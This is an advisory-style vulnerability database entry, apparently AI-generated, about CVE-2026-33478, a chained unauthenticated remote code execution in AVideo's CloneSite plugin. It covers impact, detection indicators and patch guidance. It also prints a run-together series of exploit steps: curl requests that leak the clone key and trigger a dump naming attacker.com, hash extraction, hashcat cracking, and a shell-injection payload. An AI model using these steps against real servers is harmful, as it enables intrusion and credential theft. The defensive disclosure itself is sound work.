
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33478 is a critical multi-chain vulnerability in WWBN AVideo (an open-source video platform) that allows a completely unauthenticated attacker to achieve remote code execution via chained flaws in the CloneSite plugin. The vulnerability chain involves clone key disclosure, database dump exposure, weak MD5 password hashing, and OS command injection in rsync command construction. It affects all AVideo versions up to and including 26.0. Disclosed on March 20, 2026, it carries a CVSS v3.1 base score of 10.0 (Critical) (GitHub Advisory).
The vulnerability chain consists of four linked weaknesses. First, plugin/CloneSite/clones.json.php exposes clone secret keys with zero authentication (CWE-284 / Improper Access Control). Second, the stolen key can be used to trigger a full mysqldump via cloneServer.json.php, which writes the SQL dump to a web-accessible directory and returns the file path in the JSON response. Third, user passwords in the dump are stored as unsalted MD5 hashes (CWE-916), trivially crackable with tools like hashcat. Fourth, cloneClient.json.php interpolates the videosDir field from the clone server response directly into an rsync shell command without sanitization (CWE-78), enabling OS command injection via shell metacharacters such as $(id > /tmp/pwned). A complete bash PoC with specific curl commands targeting these endpoints is publicly available in the security advisory (GitHub Advisory).
Successful exploitation results in complete server compromise: an unauthenticated attacker can execute arbitrary OS commands as the web server user, exfiltrate the entire database (including user credentials, video metadata, configurations, and secrets), and recover all user passwords from trivially crackable MD5 hashes. The scope is marked as Changed in CVSS, reflecting that the impact extends beyond the vulnerable component itself. Lateral movement is also possible, as database credentials and SSH credentials stored encrypted in the plugins table may enable access to other connected systems (GitHub Advisory).
A complete, step-by-step bash PoC using curl commands is publicly available in the GitHub security advisory, rated high confidence as a real exploit by Feedly threat intelligence. No authentication or user interaction is required for the primary attack chain. As of the advisory date, there is no confirmed evidence of in-the-wild exploitation, and no threat actor attribution has been reported. The EPSS score is approximately 0.0195 (1.95%), and the vulnerability is not currently listed in the CISA KEV catalog. Nuclei detection templates for this CVE have been added to the ProjectDiscovery nuclei-templates repository, and Qualys scanner (detection ID 5009470) has coverage (GitHub Advisory, Feedly).
http://target/plugin/CloneSite/clones.json.php and parse the JSON response to extract the key field: curl -s 'http://target/plugin/CloneSite/clones.json.php' | jq '.data[0].key'cloneServer.json.php and trigger a mysqldump, then retrieve the returned SQL file path: curl -s "http://target/plugin/CloneSite/cloneServer.json.php" --data "url=http://attacker.com&key=${CLONE_KEY}&useRsync=0" | jq '.sqlFile'curl -s "http://target/videos/clones/Clone_mysqlDump_<timestamp>.sql" | grep -oP "admin','[a-f0-9]{32}"hashcat -m 0 -a 0 <hash> rockyou.txtvideosDir value containing shell metacharacters (e.g., /tmp$(id > /tmp/pwned)). When AVideo's cloneClient.json.php constructs the rsync command, the injected payload is evaluated by the shell, achieving arbitrary command execution as the web server user (GitHub Advisory)./plugin/CloneSite/clones.json.php; POST requests to /plugin/CloneSite/cloneServer.json.php from unexpected external IPs; outbound connections from the web server to attacker-controlled hosts./videos/clones/ web-accessible directory (e.g., Clone_mysqlDump_<timestamp>.sql); new files or web shells written to the web root by the web server process; unexpected files in /tmp/ (e.g., pwned).clones.json.php, cloneServer.json.php, or cloneClient.json.php from external/unknown IPs; PHP error logs showing shell command execution errors or unusual exec() calls.mysqldump, rsync, sshpass, bash, curl, wget); unexpected mysqldump executions not initiated by scheduled backup jobs.The vendor has released a patch via commit c85d076375fab095a14170df7ddb27058134d38c in the AVideo GitHub repository; users should update to any version newer than 26.0 immediately. Key fixes include: adding admin authentication to clones.json.php, moving SQL dumps outside the web root, replacing MD5 with password_hash() (bcrypt/argon2), and sanitizing rsync parameters with escapeshellarg(). As an interim workaround if patching is not immediately possible, restrict network-level access to the AVideo instance and block external access to the /plugin/CloneSite/ directory. After patching, rotate all user passwords and any credentials stored in the AVideo database (GitHub Advisory).
The vulnerability received coverage from security news outlets including SecurityOnline.info, which highlighted it as part of a roundup of critical CVSS 10 vulnerabilities in AVideo. The Hacker Wire published a dedicated technical write-up on the chained CloneSite attack. Bluesky security community accounts shared the advisory shortly after disclosure. ProjectDiscovery added Nuclei detection templates for automated scanning of this vulnerability across multiple template releases. A Medium post by Loginsoft also referenced the vulnerability in the context of CISA KEV alerts and active exploits (SecurityOnline, Hacker Wire).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."